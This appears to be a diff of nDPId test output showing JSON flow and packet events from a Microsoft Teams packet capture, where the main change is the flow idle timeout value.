-01288{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2029,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041685984,"flow_last_seen":1587041686010,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6191,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":1587041686010,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"7d8fd34fdb13a7fff30d5a52846b6c4c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2043,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686239,"flow_last_seen":1587041686239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041686239,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2043,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1587041686239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041686239,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyPAbtgh2e9AAAAALAC\/\/9PlwAAAgQFtAEDAwUBAQgKMIS9EAAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2044,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1587041686288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041686288,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8YwZAAGwGaHQ0ck0hwKgBBgG77I9T9FE0YIdnvqASIADemAAAAgQFoAEDAwgEAggKYR9buzCEvRA="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2045,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1587041686288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041686288,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyPAbtgh2e+U\/RRNYAQEAkdGQAAAQEICjCEvUBhH1u7"} 
-00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2046,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041686239,"flow_last_seen":1587041686288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041686288,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2074,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041686239,"flow_last_seen":1587041686542,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18814,"flow_avg_l4_payload_len":587,"midstream":0,"thread_ts_msec":1587041686542,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2018,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685984,"flow_last_seen":1587041685984,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685984,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2018,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1587041685984,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685984,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOyNAbtKVk3bAAAAALAC\/\/8LQAAAAgQFtAEDAwUBAQgKMIS8GgAAAAAEAgAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2019,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1587041685996,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685996,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0TQBAAHUGACA0ccKEwKgBBgG77I3LqgPISlZN3IAS\/\/9gggAAAgQFoAEDAwgBAQQC"} 
+00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2020,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1587041685996,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041685996,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOyNAbtKVk3cy6oDyVAQIACBQQAA"} +00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2021,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685984,"flow_last_seen":1587041685997,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1587041685997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01288{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2029,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041685984,"flow_last_seen":1587041686010,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6191,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":1587041686010,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"7d8fd34fdb13a7fff30d5a52846b6c4c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2043,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686239,"flow_last_seen":1587041686239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041686239,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2043,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1587041686239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041686239,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyPAbtgh2e9AAAAALAC\/\/9PlwAAAgQFtAEDAwUBAQgKMIS9EAAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2044,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1587041686288,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041686288,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8YwZAAGwGaHQ0ck0hwKgBBgG77I9T9FE0YIdnvqASIADemAAAAgQFoAEDAwgEAggKYR9buzCEvRA="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2045,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1587041686288,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041686288,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyPAbtgh2e+U\/RRNYAQEAkdGQAAAQEICjCEvUBhH1u7"} 
+00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2046,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041686239,"flow_last_seen":1587041686288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041686288,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2074,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041686239,"flow_last_seen":1587041686542,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18814,"flow_avg_l4_payload_len":587,"midstream":0,"thread_ts_msec":1587041686542,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2076,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041686611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2076,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041686589,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1587041686659,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1587041686659,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1587041686659,"pkt":"\/\/\/\/\/\/\/\/jP5XIzfkCABFAABE9p0AAEAR\/0vAqAFwwKgB\/+EV4RUAME6OU3BvdFVkcDBE2bWZ25IvowABAADKIN8ICP0NzlEBuCwq6R7jWIhweQ=="} 
00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1587041686659,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2104,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686889,"flow_last_seen":1587041686889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041686889,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2104,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1587041686889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041686889,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGR0nAqAEGKH4JQ+yQAbuMpd1iAAAAALAC\/\/\/7KQAAAgQFtAEDAwUBAQgKMIS\/iwAAAAAEAgAA"} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2108,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1587041686918,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041686918,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8PdhAAGwG3XQofglDwKgBBgG77JCDb8\/fjKXdY6ASIAC\/qwAAAgQFoAEDAwgEAggKUkSG7zCEv4s="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2109,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1587041686918,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041686918,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR1XAqAEGKH4JQ+yQAbuMpd1jg2\/P4IAQEAn+PwAAAQEICjCEv6dSRIbv"} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2110,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041686889,"flow_last_seen":1587041686919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041686919,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
-01490{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2135,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1587041686889,"flow_last_seen":1587041686950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4662,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1587041686950,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","server_names":"login.microsoftonline.com,login.microsoftonline-p.com,loginex.microsoftonline.com,login2.microsoftonline.com,stamp2.login.microsoftonline-int.com,login.microsoftonline-int.com,loginex.microsoftonline-int.com,login2.microsoftonline-int.com,stamp2.login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"678aeaf909676262acfb913ccb78a126","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=stamp2.login.microsoftonline.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"7E:0F:A2:51:8F:FB:49:30:C3:34:07:5E:F8:7C:FD:34:20:A2:96:63"}} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2189,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687245,"flow_last_seen":1587041687245,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041687245,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2189,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1587041687245,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041687245,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyRAbt4yq\/kAAAAALAC\/\/\/rWgAAAgQFtAEDAwUBAQgKMITA4AAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2193,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1587041687293,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041687293,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8EaVAAGwGudU0ck0hwKgBBgG77JHMBk4keMqv5aASIADnTgAAAgQFoAEDAwgEAggKYPR58TCEwOA="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2194,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1587041687293,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041687293,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyRAbt4yq\/lzAZOJYAQEAkl0AAAAQEICjCEwQ9g9Hnx"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2195,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687245,"flow_last_seen":1587041687294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041687294,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2104,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686889,"flow_last_seen":1587041686889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041686889,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2104,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1587041686889,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041686889,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGR0nAqAEGKH4JQ+yQAbuMpd1iAAAAALAC\/\/\/7KQAAAgQFtAEDAwUBAQgKMIS\/iwAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2108,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1587041686918,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041686918,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8PdhAAGwG3XQofglDwKgBBgG77JCDb8\/fjKXdY6ASIAC\/qwAAAgQFoAEDAwgEAggKUkSG7zCEv4s="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2109,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1587041686918,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041686918,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR1XAqAEGKH4JQ+yQAbuMpd1jg2\/P4IAQEAn+PwAAAQEICjCEv6dSRIbv"} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2110,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041686889,"flow_last_seen":1587041686919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041686919,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 